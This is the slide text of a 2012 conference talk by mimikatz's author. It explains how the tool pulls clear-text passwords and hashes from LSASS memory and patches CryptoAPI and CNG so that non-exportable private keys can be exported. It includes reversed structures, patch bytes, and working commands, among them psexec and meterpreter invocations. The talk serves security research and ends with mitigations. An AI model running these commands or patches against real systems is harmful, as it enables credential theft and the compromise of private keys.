mimikatz @ asfws

mimikatz

Benjamin DELPY `gentilkiwi`focus on sekurlsa/pass-the-pass

and crypto patches

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 2

Who ? Why ?

Benjamin DELPY `gentilkiwi`– French– 26y– Kiwi addict– Lazy programmer

Started to code mimikatz to :– explain security concepts ;– improve my knowledge ;– prove to Microsoft that sometimes they must change old habits.

Why all in French ?– because I’m – It limits script kiddies usage– Hack with class

07/11/2012


mimikatzworking

On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8– x86 & x64– 2000 support dropped with mimikatz 1.0

Everywhere ; it’s statically compiled

Two modes– direct action (local commands) – process or driver communication

07/11/2012

sekurlsa.dll

mimikatz.exe

KeyIso« Isolation de clé CNG »

LSASS.EXE

Direct action :crypto::patchcng

EventLog« Journal d’événements Windows »

SVCHOST.EXE

Direct action :divers::eventdrop

mimikatz.exe

SamSS« Gestionnaire de comptes de sécurité »

LSASS.EXE

VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...

Open a pipeWrite a welcome messageWait commands… and return results


mimikatzarchitecture of sekurlsa & crypto

07/11/2012

mimikatz.exe

mod_mimikatz_sekurlsa

mod_mimikatz_nogpo

mod_mimikatz_divers

mod_mimikatz_winmine

mod_mimikatz_impersonate

mod_mimikatz_inject

mod_mimikatz_samdump

mod_mimikatz_standard

mod_mimikatz_crypto

mod_mimikatz_handle

mod_mimikatz_system

mod_mimikatz_service

mod_mimikatz_process

mod_mimikatz_thread

mod_mimikatz_terminalserver

mod_mimikatz_privilege

mod_pipe

mod_inject

mod_memory

mod_parseur

mod_patch

mod_hive

mod_secacl

mod_privilege

mod_process

mod_service

mod_system

mod_thread

mod_ts

mod_text

mod_crypto

mod_cryptoapi

mod_cryptoacng

msv_1_0

tspkg

wdigest

livessp

kerberos

kappfree.dll

kelloworld.dll

klock.dll

mimikatz.sys

sekurlsa.dll

sam

secrets

msv_1_0

wdigest

livessp

kerberos

tspkg


mimikatz :: sekurlsawhat is it ?

A module replacement for my previous favorite library !

A local module that can read data from the SamSS Service (well known LSASS process)

What sekurlsa module can dump :– MSV1_0 hashes– TsPkg passwords– Wdigest passwords– LiveSSP passwords– Kerberos passwords (!)– …?

07/11/2012

mod_mimikatz_sekurlsa


mimikatz :: sekurlsahow LSA works ( level)

07/11/2012

LsaSSWinLogon

Authentication Packagesmsv1_0

tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

user:domain:password

PLAYSKOOL


mimikatz :: sekurlsahow LSA works ( level)

Authentication packages :– take user’s credentials from the logon– make their own stuff– keep enough data in memory to compute responses of

challenges (Single Sign On)

If we can get data, and inject it in another session of LSASS, we avoid authentication part

This is the principle of « Pass-the-hash »– In fact, of « Pass-the-x »

07/11/2012

PLAYSKOOL


mimikatz :: sekurlsahistory of « pass-the-* » 1/2

Pass-the-hash– 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)– 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan

Ochoa (CoreSecurity)– 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and

provide some downloads of it – 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86

& x64 versions of Windows (yeah, by myself but in French; so not famous ;))

2007 was the year of pass the hash !

Pass-the-ticket– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket

support; Hernan Ochoa (Ampliasecurity)

07/11/2012


mimikatz :: sekurlsahistory of « pass-the-* » 2/2

Pass-the-pass– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT

6 and some XP SP3)• http://blog.gentilkiwi.com/securite/pass-the-pass

– 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;))

• http://blog.gentilkiwi.com/securite/re-pass-the-pass

– 05/2011 – Some organizations opened cases to Microsoft about it…

…Lots of time…

– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz– 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password

extract…• http://seclists.org/pen-test/2012/Mar/7

– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory

• http://blog.gentilkiwi.com/securite/rere-pass-the-pass

– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory• http://blog.gentilkiwi.com/securite/rerere-pass-the-pass

– 08/2012 – sekurlsa module without injection at all ! (ultra safe)• http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition

07/11/2012

http://blog.gentilkiwi.com/securite/pass-the-pass

http://blog.gentilkiwi.com/securite/re-pass-the-pass

http://seclists.org/pen-test/2012/Mar/7

http://blog.gentilkiwi.com/securite/rere-pass-the-pass

http://blog.gentilkiwi.com/securite/rerere-pass-the-pass

http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition

http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition


mimikatz :: sekurlsa :: tspkg

because sometimes hash is not enough…

07/11/2012


mimikatz :: sekurlsa :: tspkgwhat is it ?

Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop users’s experience– http://technet.microsoft.com/library/cc772108.aspx

Rely on CredSSP with Credentials Delegation (!= Account delegation)– Specs :

http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression : it seems cool – User does not have to type its password– Password is not in RDP file– Password is not in user secrets07/11/2012

http://technet.microsoft.com/library/cc772108.aspx




mimikatz :: sekurlsa :: tspkgquestions ?

KB says that for it works, we must enable « Default credentials » delegation– “Default credentials : The credentials obtained when the user first logs on to

Windows” - https://msdn.microsoft.com/library/bb204773.aspx

• What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …– In all cases, system seems to be vulnerable to pass-the-*…

In what form ?Our specs : [MS-CSSP]– 2.2.1.2.1 TSPasswordCreds

• The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)

TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password [2] OCTET STRING

}

– Challenge / response for authentication ?• Serveur : YES (TLS / Kerberos)• Client : NO ; *password* is sent to server…

So password resides somewhere in memory ?07/11/2012

https://msdn.microsoft.com/library/bb204773.aspx


mimikatz :: sekurlsa :: tspkgsymbols & theory

Let’s explore some symbols !

– sounds cool… (thanks Microsoft)

Let’s imagine a scenario– Enumerate all sessions to obtain :

• Username• Domain• LUID

– Call tspkg!TSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain :

• TS_CREDENTIAL

– Call tspkg!TSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :

• TS_PRIMARY_CREDENTIAL with clear text credentials…

07/11/2012

kd> x tspkg!*clear*75016d1c tspkg!TSObtainClearCreds = <no type information>kd> x tspkg!*password*75011b68 tspkg!TSDuplicatePassword = <no type information>75011cd4 tspkg!TSHidePassword = <no type information>750195ee tspkg!TSRevealPassword = <no type information>75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>kd> x tspkg!*locate*7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>


mimikatz :: sekurlsa :: tspkgworkflow

07/11/2012

RtlLookupElementGenericTableAvl

LsaUnprotectMemory

KIWI_TS_CREDENTIAL

KIWI_TS_PRIMARY_CREDENTIAL

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {PVOID unk0;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Password;

} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

LsaEnumerateLogonSessions

for each LUID

password in clear !

tspkg!TSGlobalCredTable

typedef struct _KIWI_TS_CREDENTIAL {#ifdef _M_X64 BYTE unk0[108];#elif defined _M_IX86 BYTE unk0[64];#endif LUID LocallyUniqueIdentifier; PVOID unk1; PVOID unk2; PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

KIWI_TS_CREDENTIAL


mimikatz :: sekurlsa :: tspkgdemo time !

sekurlsa::tspkg

07/11/2012


mimikatz :: sekurlsa :: wdigest

because clear text password over http/https is not cool

07/11/2012


mimikatz :: sekurlsa :: wdigestwhat is it ?

“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]”Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication

“Common Digest Authentication Scenarios :– Authenticated client access to a Web site– Authenticated client access using SASL– Authenticated client access with integrity protection to a directory service using

LDAP”Microsoft : http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool – No password over the network, just hashes– No reversible password in Active Directory ; hashes for each realm

• Only with Advanced Digest authentication

07/11/2012

http://en.wikipedia.org/wiki/Digest_access_authentication



mimikatz :: sekurlsa :: wdigestwhat is it ?

We speak about hashes, but what hashes ?H = MD5(HA1:nonce:[…]:HA2)

• HA1 = MD5(username:realm:password)• HA2 = MD5(method:digestURI:[…])

Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon

WDigest provider must have elements to compute responses for different servers :– Username– Realm (from server)– Password

07/11/2012


mimikatz :: sekurlsa :: wdigesttheory

This time, we know :– that WDigest keeps password in memory « by protocol » for HA1 digest– that LSASS love to unprotect password with LsaUnprotectMemory (so protect with

LsaProtectMemory)

LsaUnprotectMemory– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE– Let’s perform a research in WDigest :

– Hypothesis seems verified

LsaProtectMemory– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE– Let’s perform a research in WDigest :

– SpAcceptCredentials takes clear password in args• Protect it with LsaProtectMemory• Update or insert data in double linked list : wdigest!l_LogSessList

07/11/2012

.text:7409D151 _DigestCalcHA1@8 call dword ptr [eax+0B4h]

.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]


mimikatz :: sekurlsa :: wdigestworkflow

07/11/2012

LsaUnprotectMemory


for each LUID

typedef struct _KIWI_WDIGEST_LIST_ENTRY {struct _KIWI_WDIGEST_LIST_ENTRY *Flink;struct _KIWI_WDIGEST_LIST_ENTRY *Blink;DWORD UsageCount;struct _KIWI_WDIGEST_LIST_ENTRY *This;LUID LocallyUniqueIdentifier;[…]LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;[…]

} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

wdigest!l_LogSessList

search linked list for LUID

KIWI_WDIGEST_LIST_ENTRY

password in clear !


mimikatz :: sekurlsa :: wdigestdemo time !

sekurlsa::wdigest

07/11/2012


mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks

07/11/2012


mimikatz :: sekurlsa :: livessphow

Actually I’ve only used logical (empirical) approach to search passwords… :– Protocol reading– Symbols searching

~ Boring ~… be more brutal this time : make a WinDBG trap !

07/11/2012

0: kd> !process 0 0 lsass.exePROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4 DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible> Image: lsass.exe

0: kd> .process /i 83569040You need to continue execution (press 'g' <enter>) for the contextto be switched. When the debugger breaks in again, you will be inthe new process context.0: kd> gBreak instruction exception - code 80000003 (first chance)nt!RtlpBreakWithStatusInstruction:814b39d0 cc int 30: kd> .reload /userLoading User Symbols............................................................0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"0: kd> g


mimikatz :: sekurlsa :: livessphow

Let’s login with a Live account on Windows 8 !

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

07/11/2012

lsasrv!LsaProtectMemorylivessp!LiveMakeSupplementalCredlivessp!LiveMakeSecPkgCredentialslivessp!LsaApLogonUserEx2livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemorymsv1_0!NlpAddPrimaryCredentialmsv1_0!SspAcceptCredentialsmsv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemorytspkg!TSHidePasswordtspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2livessp!LsaApLogonUserEx2 (74781536)[...] livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider

Yeah, Pass the Hash capability with Live account too…

Live user can logon through RDP via SSO


mimikatz :: sekurlsa :: livesspworkflow

07/11/2012

LsaUnprotectMemory


for each LUID

password in clear !

typedef struct _KIWI_LIVESSP_LIST_ENTRY {struct _KIWI_LIVESSP_LIST_ENTRY *Flink;struct _KIWI_LIVESSP_LIST_ENTRY *Blink;PVOID unk0;PVOID unk1;PVOID unk2;PVOID unk3;DWORD unk4;DWORD unk5;PVOID unk6;LUID LocallyUniqueIdentifier;LSA_UNICODE_STRING UserName;PVOID unk7;PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;

} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

livessp!LiveGlobalLogonSessionList


KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {

DWORD isSupp;DWORD unk0;LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;

} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;


mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*

07/11/2012

* Me, yes


mimikatz :: sekurlsa :: kerberos

Let’s login normal account

After credentials protection, KerbCreateLogonSession calls :– NT6 ; KerbInsertOrLocateLogonSession to insert data in

KerbGlobalLogonSessionTable

– NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList07/11/2012

lsasrv!LsaProtectMemorykerberos!KerbHideKeykerberos!KerbCreatePrimaryCredentialskerberos!KerbCreateLogonSessionkerberos!SpAcceptCredentials

lsasrv!LsaProtectMemorykerberos!KerbHidePasswordkerberos!KerbCreateLogonSessionkerberos!SpAcceptCredentials

lsasrv!LsaProtectMemorymsv1_0!NlpAddPrimaryCredentialmsv1_0!SspAcceptCredentialsmsv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemorywdigest!SpAcceptCredentials

lsasrv!LsaProtectMemorytspkg!TSHidePasswordtspkg!SpAcceptCredentials

Kerberos part for password ??????

Kerberos, ticket part ? Maybe ;)


mimikatz :: sekurlsa :: kerberos (nt6)workflow

07/11/2012

RtlLookupElementGenericTableAvl

LsaUnprotectMemory

KIWI_KERBEROS_PRIMARY_CREDEN

TIAL

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL{

DWORD unk0;PVOID unk1;PVOID unk2;PVOID unk3;

#ifdef _M_X64BYTE unk4[32];

#elif defined _M_IX86BYTE unk4[20];

#endifLUID LocallyUniqueIdentifier;

#ifdef _M_X64BYTE unk5[44];

#elif defined _M_IX86BYTE unk5[36];

#endifLSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;

} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;


for each LUID

password in clear !

KIWI_KERBEROS_PRIMARY_CREDEN

TIAL

Kerberos!KerbGlobalLogonSessionTable


mimikatz :: sekurlsa :: kerberos (nt5)workflow

07/11/2012

LsaUnprotectMemory


for each LUID

password in clear !

typedef struct _KIWI_KERBEROS_LOGON_SESSION {struct _KIWI_KERBEROS_LOGON_SESSION *Flink;struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount;PVOID unk0;PVOID unk1;PVOID unk2;DWORD unk3;DWORD unk4;PVOID unk5;PVOID unk6;PVOID unk7;LUID LocallyUniqueIdentifier;

#ifdef _M_IX86DWORD unk8;

#endifDWORD unk9;DWORD unk10;PVOID unk11;DWORD unk12;DWORD unk13;PVOID unk14;PVOID unk15;PVOID unk16;[…]LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;

} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

kerberos!KerbLogonSessionList


KIWI_LIVESSP_PRIMARY_CREDENTIAL


mimikatz :: sekurlsademo time !

Final sekurlsa demo sekurlsa::logonPasswords full

07/11/2012


mimikatz :: sekurlsa :: kerberos“hu ?”

Ok It works…*But why ?* Not at all logon on NT5 (can need an unlock)

From my understanding of Microsoft explanations– no need of passwords for the Kerberos protocol… – all is based on the hash (not very sexy too)

Microsoft’s implementation of Kerberos is full of logical…– For password auth :

• password hash for shared secret, but keeping password in memory– For full smartcard auth :

• No password on client• No hash on client ?

– NTLM hash on client…– KDC sent it back as a gift

07/11/2012


mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way to be used

We used LsaUnprotecMemory, in the LSASS context, to decrypt them

– This function rely on LsaEncryptMemory from lsasrv.dll

For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take benefits of its keys when we called it

Can it be fun to decrypt outside the process ?– Yes, it is… no more injection, just reading memory of LSASS process…

mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys – When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we

have the same comportments than when we are in LSASS !

07/11/2012

LsaUnprotectMemory


mimikatz :: sekurlsaLsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory use :– RC4

– DESx

07/11/2012

g_pRandomKey

g_cbRandomKey

@BYTE[g_cbRandomKey]

DWORD ; 256

BYTE[g_cbRandomKey]

g_pDESXKey @BYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copy…


mimikatz :: sekurlsaLsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory use :

– 3DES

– AES

07/11/2012

InitializationVector

BYTE[16]

lsass

lsasrv

lsass

lsasrv

mimikatz

copy…

h3DesKey

typedef struct _KIWI_BCRYPT_KEY_DATA { DWORD size; DWORD tag; DWORD type; DWORD unk0; DWORD unk1; DWORD unk2; DWORD unk3; PVOID unk4; BYTE data; /* etc... */} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

hAesKey

lsasrv

typedef struct _KIWI_BCRYPT_KEY { DWORD size; DWORD type; PVOID unk0; PKIWI_BCRYPT_KEY_DATA cle; PVOID unk1;} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;


mimikatz :: sekurlsamemo

Security Packages

Protection Keys

07/11/2012

Package Symbols Typetspkg tspkg!TSGlobalCredTable RTL_AVL_TABLE

wdigest wdigest!l_LogSessList LIST_ENTRY

livessp livessp!LiveGlobalLogonSessionList LIST_ENTRY

kerberos (nt5) kerberos!KerbLogonSessionList LIST_ENTRY

kerberos (nt6) kerberos!KerbGlobalLogonSessionTable RTL_AVL_TABLE

msv1_0 lsasrv!LogonSessionListlsasrv!LogonSessionListCount

LIST_ENTRYULONG

Key NT 5 SymbolsRC4 lsasrv!g_cbRandomKey

lsasrv!g_pRandomKey

DESx lsasrv!g_pDESXKeylsasrv!g_Feedback

Key NT 6 Symbolslsasrv!InitializationVector

3DES lsasrv!h3DesKey

AES lsasrv!hAesKey


mimikatz :: sekurlsamemo

Some commands : mimikatz privilege::debug "sekurlsa::logonPasswords full" exit

psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

07/11/2012

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */// http://blog.gentilkiwi.com/mimikatz mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;234870Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w8-rp-x msv1_0 : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ wdigest : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ tspkg : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ livessp : n.t. (LUID KO)


mimikatz :: sekurlsawhat we can do ?

Basics– No physical access to computer (first step to pass the hash, then pass the pass)– No admin rights / system rights / debug privileges (…)– Disable local admin accounts– Strong passwords (haha, it was a joke ; so useless !!!)– For privileged account, network login instead of interactive (when possible)– Audit ; pass the hash keeps traces and can lock accounts– No admin rights / system rights / debug privileges, even VIP– Use separated network (or forest) for privileged tasks

More in depth– Force strong authentication (SmartCard & Token) : $ / €– Short validity for Kerberos tickets– No delegation– Disable NTLM (available with NT6)– No exotic :

• biometrics (it keeps password somewhere and push it to Windows)• single sign on

– Stop shared secrets for authentication : push Public / Private stuff (like keys ;))– Let opportunities to stop retro compatibility– Disable faulty providers ?

• Is it supported by Microsoft ?• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?

07/11/2012


mimikatz :: cryptowhat is it ?

A little module that I wrote to :– play with Windows Cryptographic API / CNG and RSA keys– automate export of certificates/keys

• Even those which are “not” exportable

What crypto module can do :– List

• Providers• Stores• Certificates• Keys

– Export• Certificates

– public in DER format– with private keys in PFX format

• Private keys in PVK format – it’s cool, OpenSSL can deal with it too

– Patch• CryptoAPI in mimikatz context• CNG in LSASS context (again !)

07/11/2012

mod_mimikatz_crypto


mimikatz :: cryptohow it’s protected

Private keys are DPAPI protected– You cannot reuse private key files on another computer

• At least without the master keys and/or password of users

Computer/User can load their own keys because they have enough secrets to do it (ex : session opened)– Yes, a computer/server open a “session”

Export/Usage can be limited by :– Password– Popup– Export/Archive flag no present

07/11/2012

Constraint for most userUnavailable for computer keys

certutil -importpfx mycert.p12 NoExportcertutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport


mimikatz :: crypto :: capihow it works

“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.”

– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …

– cryptdll.dll, rsaenh.dll, …

Process deal with cryptographic keys by this API…

07/11/2012




mimikatz :: crypto :: capihow it’s exported ( level)

07/11/2012

Process

CryptoAPI and RSA CSP

Exportable ?Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key


mimikatz :: crypto :: patchcapibecause I own my process

When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey

This function do all the work to prepare the export, and check if the key is exportable

07/11/2012

mimikatz # crypto::exportCertificatesEmplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My - Benjamin Delpy Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03} Provider : Microsoft Enhanced Cryptographic Provider v1.0 Type : AT_KEYEXCHANGE Exportabilité : NON Taille clé : 2048 Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié. Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================Numéro de série : 112169417a1c3ef46a301f99385f50680fa0Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BEObjet: CN=Benjamin Delpy, C=FRIl ne s'agit pas d'un certificat racineHach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03} Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0La clé privée NE PEUT PAS être exportéeSuccès du test de cryptageCertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

Exportable ?


mimikatz :: crypto :: patchcapibecause I own my process

So what ? A module in my own process return that I can’t do something ?CryptoAPI is in my memory space, let’s patch it !

I wrote “4” bytes in my memory space

07/11/2012

.text:0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive

.text:0AC0B7CB 90 nop

.text:0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare

.text:0AC1F749 90 nop

.text:0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare


mimikatz :: crypto :: patchcapidemo time !

Import, export, import as not exportable…. export

07/11/2012


mimikatz :: crypto :: patchcapilimitations

Because :– I’m lazy– I’ve seen in majority of case RSA keys for real life use

• Elliptic Curve a little…

mimikatz crypto::patchcapi only deal with :– Microsoft Base Cryptographic Provider v1.0– Microsoft Enhanced Cryptographic Provider v1.0– Microsoft Enhanced RSA and AES Cryptographic Provider– Microsoft RSA SChannel Cryptographic Provider– Microsoft Strong Cryptographic Provider

…all based on rsaenh.dll

07/11/2012


mimikatz :: crypto :: cnghow it works

“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”

– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.

This time, keys operations are not made in the “user” process context

Process use RPC to call “Key isolation service” (keyiso) functions

It seems more secure than CryptoAPI…– It is, but it’s not perfect…

07/11/2012

http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx


mimikatz :: crypto :: cnghow it’s exported ( level)

KeyIso Service (LSASS Process)

07/11/2012

Process

CNG

Exportable ?Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key

NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP

no


mimikatz :: crypto :: patchcngbecause sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey

This function do all the work to prepare the export, and check if the key is exportable

07/11/2012

mimikatz # crypto::exportKeys[user] Clés CNG : - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabilité : NON Taille clé : 2048 Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.

Exportable ?


mimikatz :: crypto :: patchcngbecause sometimes I own LSASS

This time, checks and keys are in LSASS process…And what ?

I wrote “1” byte in LSASS memory space…

07/11/2012

.text:6C815210 75 1C jnz short continue_key_export

.text:6C815210 EB 1C jmp short continue_key_export


mimikatz :: crypto :: patchcngdemo time !

Import, export, import as not exportable…. export again

07/11/2012


mimikatz :: crypto :: patchcnglimitations

Patch operation needs some privileges– Admin (debug privilege)– SYSTEM

mimikatz crypto::patchcng only deal with :– Microsoft Software Key Storage Provider (maybe others algs than RSA)

Not a limitation of mimikatz, but MMC addin for certificates cannot export CNG certificates… even those that are exportable (hu ?)

– certutil can…

07/11/2012


mimikatz :: crypto :: patchcngbonus

After one admin patched LSASS, all users of current system benefit of extra exports– until reboot / KeyIso service restart

Some others programs that doesn’t check the export flag before asking export can work too– Yeah, like the old good one : certutil

07/11/2012

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfxMY================ Certificat 1 ================[…]Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage ProviderLa clé privée NE PEUT PAS être exportéeSuccès du test de chiffrementCertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfxMY================ Certificat 1 ================[…]Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage ProviderSuccès du test de chiffrementCertUtil: -exportPFX La commande s'est terminée correctement.


mimikatz :: cryptomemo

Some commands : mimikatz crypto::patchcapi crypto::exportCertificates exit

